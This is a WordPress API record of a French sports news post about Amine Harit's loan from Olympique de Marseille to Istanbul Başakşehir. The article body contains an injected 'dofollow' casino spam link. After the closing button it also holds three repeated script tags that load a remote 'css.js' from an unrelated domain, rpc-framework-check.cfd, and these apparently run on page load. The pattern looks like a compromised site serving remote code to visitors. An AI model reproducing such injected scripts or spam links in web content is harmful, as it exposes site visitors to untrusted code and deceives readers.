{"id":3947,"date":"2025-11-20T03:50:57","date_gmt":"2025-11-20T03:50:57","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3947"},"modified":"2026-02-02T22:11:30","modified_gmt":"2026-02-02T22:11:30","slug":"mercato-om-cest-officiel-harit-quitte-lom-pour-la-turquie","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/mercato-om-cest-officiel-harit-quitte-lom-pour-la-turquie\/","title":{"rendered":"Mercato OM &#8211; c&#x27;est officiel, Harit quitte l&#x27;OM pour la Turquie !"},"content":{"rendered":"<h1>Mercato OM &#8211; c&#x27;est officiel, Harit quitte l&#x27;OM pour la Turquie !<\/h1>\n<p><strong>Amine Harit<\/strong> s\u2019appr\u00eate \u00e0 tourner une nouvelle page de sa carri\u00e8re. L\u2019Olympique de Marseille et l\u2019Istanbul Ba\u015fak\u015fehir ont trouv\u00e9 un accord pour un pr\u00eat assorti d\u2019une option d\u2019achat. L\u2019op\u00e9ration devrait \u00eatre officialis\u00e9e rapidement. Pour le joueur de 28 ans, il s\u2019agit d\u2019une opportunit\u00e9 de relancer une trajectoire en perte de vitesse depuis pr\u00e8s d&#x27;un an et son expulsion contre le PSG.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-drive.com\/casino-drive-retraits\/\" target=\"_blank\" rel=\"dofollow\">casino drive Retraits<\/a><\/strong> &#8211; Vous avez gagn\u00e9 gros sur casino-drive.com et vous vous demandez comment retirer vos gains rapidement ? Vous voulez savoir quelles sont les options de d\u00e9p\u00f4t<\/p><\/blockquote>\n<h2>Un r\u00f4le en recul \u00e0 l\u2019OM<\/h2>\n<p>Arriv\u00e9 en 2021 en provenance de Schalke 04, d\u2019abord sous la forme de deux pr\u00eats avant un transfert d\u00e9finitif, le milieu offensif marocain avait conquis le V\u00e9lodrome avec un beau final sous Sampaoli. Mais la saison pass\u00e9e, il n\u2019a disput\u00e9 que 13 rencontres toutes comp\u00e9titions confondues, inscrivant deux buts et d\u00e9livrant quatre passes d\u00e9cisives.<\/p>\n<h2>Un effectif marseillais \u00e0 all\u00e9ger<\/h2>\n<p>Le choix de se s\u00e9parer de l\u2019international marocain s\u2019inscrit dans une logique plus large. Comme d\u2019autres joueurs tels que Ruben Blanco ou Neal Maupay, Harit n\u2019a pas \u00e9t\u00e9 retenu sur la liste pour la Ligue des Champions. Le club phoc\u00e9en, soucieux de r\u00e9duire son groupe, a donc privil\u00e9gi\u00e9 un d\u00e9part, m\u00eame apr\u00e8s la fin du mercato des grands championnats europ\u00e9ens.<\/p>\n<h2>Objectif relance et Coupe du Monde 2026<\/h2>\n<p>En rejoignant Ba\u015fak\u015fehir, Harit esp\u00e8re retrouver du temps de jeu et se replacer dans la hi\u00e9rarchie de la s\u00e9lection marocaine. Avec 24 s\u00e9lections et une Coupe du Monde en ligne de mire, le milieu offensif sait qu\u2019il devra convaincre par ses performances en club pour rester dans les plans de son s\u00e9lectionneur. La Turquie repr\u00e9sente ainsi une \u00e9tape strat\u00e9gique pour la suite de son parcours. Sur son parcours et ses quatre ann\u00e9es \u00e0 Marseille, son apport lors de la double-confrontation contre le Sporting Lisbonne en Ligue des champions en 2022 reste au premier plan.<\/p>\n<p><button class=\"button_button__AbnlE button_md__HB_Xg button_blue__rWPTN\">Retrouvez le tableau des transferts de l&#x27;OM ici<\/button><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mercato OM &#8211; c&#x27;est officiel, Harit quitte l&#x27;OM pour la Turquie ! Amine Harit s\u2019appr\u00eate \u00e0 tourner une nouvelle page de sa carri\u00e8re. L\u2019Olympique de Marseille et l\u2019Istanbul Ba\u015fak\u015fehir ont&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3947","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3947"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3947\/revisions"}],"predecessor-version":[{"id":14895,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3947\/revisions\/14895"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}